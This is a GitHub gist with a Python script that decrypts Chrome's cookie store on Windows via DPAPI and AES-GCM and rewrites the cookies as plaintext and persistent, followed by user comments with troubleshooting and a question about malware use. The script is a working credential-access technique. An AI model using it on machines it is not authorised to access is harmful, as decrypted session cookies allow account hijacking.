Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Decrypt Chrome Cookies File (Python 3) - Windows
# Based on:
# https://gist.github.com/DakuTree/98c8362fb424351b803e
# https://gist.github.com/jordan-wright/5770442
# https://gist.github.com/DakuTree/428e5b737306937628f2944fbfdc4ffc
# https://stackoverflow.com/questions/60416350/chrome-80-how-to-decode-cookies
# https://stackoverflow.com/questions/43987779/python-module-crypto-cipher-aes-has-no-attribute-mode-ccm-even-though-pycry
import os
import json
import base64
import sqlite3
from shutil import copyfile
# python.exe -m pip install pypiwin32
import win32crypt
# python.exe -m pip install pycryptodomex
from Cryptodome.Cipher import AES
# Copy Cookies and Local State to current folder
copyfile(os.getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')
# Load encryption key
encrypted_key = None
with open(os.getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Local State", 'r') as file:
encrypted_key = json.loads(file.read())['os_crypt']['encrypted_key']
encrypted_key = base64.b64decode(encrypted_key)
encrypted_key = encrypted_key[5:]
decrypted_key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
# Connect to the Database
conn = sqlite3.connect('./Cookies')
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT host_key, name, value, encrypted_value FROM cookies')
for host_key, name, value, encrypted_value in cursor.fetchall():
# Decrypt the encrypted_value
try:
# Try to decrypt as AES (2020 method)
cipher = AES.new(decrypted_key, AES.MODE_GCM, nonce=encrypted_value[3:3+12])
decrypted_value = cipher.decrypt_and_verify(encrypted_value[3+12:-16], encrypted_value[-16:])
except:
# If failed try with the old method
decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
# Update the cookies with the decrypted value
# This also makes all session cookies persistent
cursor.execute('\
UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0\
WHERE host_key = ?\
AND name = ?',
(decrypted_value, host_key, name));
conn.commit()
conn.close()
@GramThanos
Copy link
Author

GramThanos commented Feb 2, 2021

Code updated to support new encryption method.
A more advance version/tool can be found here

@jaxe233
Copy link

jaxe233 commented Feb 3, 2021

Hey there! I know it might look like a silly question, but to decrypt Chrome's cookies, it needs to do it from the User's machine right? What if, lets say, there's a malware that steals cookies, can it also decrypt it too with this kind of method?

@GramThanos
Copy link
Author

GramThanos commented Feb 3, 2021

@jaxe233 interesting question, especially when it comes from a user that just registered an account and added as a profile picture a South Korean singer.

@nootkroot
Copy link

nootkroot commented Feb 5, 2021

How would I edit this to work with other things like the History? Especially the last cursor.execute(), I don't really know SQL so I don't understand.

@gitHubMaster555
Copy link

gitHubMaster555 commented Feb 27, 2021

Hey There @gram Thanos. I only see the cookies file being copied to directory where the python script is located. Is there an output directory I should be looking for?

@GramThanos
Copy link
Author

GramThanos commented Feb 27, 2021

@gitHubMaster555 this functionality was there before my fork. The cookies file is copied to the current working directory (CWD) which may not be the folder where your script is located (it depends on how you call the script).

@AnateXP
Copy link

AnateXP commented May 22, 2021

Hey There @GramThanos . I found some error and this script cannot running on my pc.
First I run it script it print this error:
Traceback (most recent call last): File "C:\Users\ANT\AppData\Local\123456\de.py", line 25, in <module> encrypted_key = json.loads(file.read())['os_crypt']['encrypted_key'] UnicodeDecodeError: 'gbk' codec can't decode byte 0xaa in position 23571: illegal multibyte sequence
When I transcoding "Local State" UTF-8 to gbk.
Traceback (most recent call last): File "C:\Users\ANT\AppData\Local\123456\de.py", line 28, in <module> decrypted_key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1] pywintypes.error: (-2146893813, 'CryptProtectData', 'Key not valid for use in specified state.')
How to fix it ?

@GramThanos
Copy link
Author

GramThanos commented May 22, 2021

@AnateXP check the file's os.getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Local State" contents. Something is not right there. This has to do with your chrome I guess.

Copy link

ghost commented May 25, 2021

Can you help me about this error? "sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10�V� h�#��P��*�-4�n�§���g��'"

@GramThanos
Copy link
Author

GramThanos commented May 25, 2021

Can you help me about this error? "sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10�V� h�#��P��*�-4�n�§���g��'"

There are many results on Google with discussions on this error.

@lededev
Copy link

lededev commented Jun 4, 2021

Can you help me about this error? "sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10�V� h�#��P��*�-4�n�§���g��'"

There are many results on Google with discussions on this error.

I am also got this error, sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10��~��|�d:. 3�,:X��&���lr2���Kk���e�%U��l'
OS: Windows 10 x64 20H2
Python: 3.9.2
Google and try add conn.text_factory = bytes or conn.text_factory = str can not resolve it.

@rahulmr
Copy link

rahulmr commented Aug 28, 2021

Can you help me about this error? "sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10�V� h�#��P��*�-4�n�§���g��'"

There are many results on Google with discussions on this error.

I am also got this error, sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v10��~��|�d:. 3�,:X��&���lr2���Kk���e�%U��l'
OS: Windows 10 x64 20H2
Python: 3.9.2
Google and try add conn.text_factory = bytes or conn.text_factory = str can not resolve it.

conn.text_factory = bytes helped me to resolved the issue. Thanks a lot!

@efimo4
Copy link

efimo4 commented May 16, 2022

Thank you for this good work. I had a need to change the encrypted cookie value. Please tell me how to encrypt the new value?

@efimo4
Copy link

efimo4 commented May 16, 2022

I tried to do something, but it didn't work out.

code

def get_encryption_value(key, data):
    iv = b'v10' + Random.get_random_bytes(12)
    cipher = AES.new(key, AES.MODE_GCM, iv)
    data = bytes(data, "utf-8")
    encryption_value = iv + cipher.encrypt(data)
    print(encryption_value)

@GramThanos
Copy link
Author

GramThanos commented May 16, 2022

I haven't tried anything similar.

@QGB
Copy link

QGB commented Jul 27, 2022

我没有尝试过类似的东西。

password = win32crypt.CryptUnprotectData(result[2])[1].decode()
error: (13, 'CryptProtectData', '数据无效。')
我更新了代码以使用新的 chrome 加密系统

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment